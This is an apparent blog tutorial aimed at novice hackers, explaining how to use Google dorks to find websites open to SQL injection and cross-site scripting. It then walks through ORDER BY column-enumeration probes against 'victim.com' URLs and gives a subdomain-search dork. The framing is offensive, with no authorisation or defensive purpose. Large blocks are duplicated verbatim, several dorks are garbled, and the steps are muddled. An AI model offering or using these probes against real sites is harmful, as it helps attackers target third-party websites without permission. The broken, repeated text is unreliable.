Find A Vulnerable Website Using Google Dorks
Hi Guys.In My previous Post i give you some Google Dorks list.Now Today I tell You How To Find A Vulnerable Website Using Google Dorks.Most of the people search in Google or other search engine to check the vulnerable website and in the end some are successful and some are not. This is also problem for new Hackers who don’t know how to check the vulnerable website.Google is best friend for Hackers.Now We can find the Vulnerable website using Google search. This is known as Google Dorks.
There are lot of dorks to check the website is it vulnerable or not.There are lot of dorks to check the website is it vulnerable or not.
Now Lets Start :
There are lot of dorks to check the website is it vulnerable or not.There are lot of dorks to check the website is it vulnerable or not.
Now Lets Start :
Check website for SQL injection SQLI:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
For More Click Here
copy one from above list and paste in Google search box,And hit enter like shown below
Eg:
http://www.Google.com/index.php?id=2
Now hit enter:
if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.
Now let's check further:Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)
Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
For More Click Here
copy one from above list and paste in Google search box,And hit enter like shown below
Eg:
http://www.Google.com/index.php?id=2
Now hit enter:
if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.
Now let's check further:Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)
Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)
Check website for Cross site scripting XSS:
inurl:".php?search="
inurl:".php?searchstring="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
How to check Sub domain :
If you want to find vulnerabilities of website . so you should go for sub domain. The best dork for searching subdomain is below
Site: URL –inurl:www
Like if I want to find the subdomain of Google . so it’s like below and don’t add Http and www with the domain
Site: google.com –inurl:www
Enjoy :)
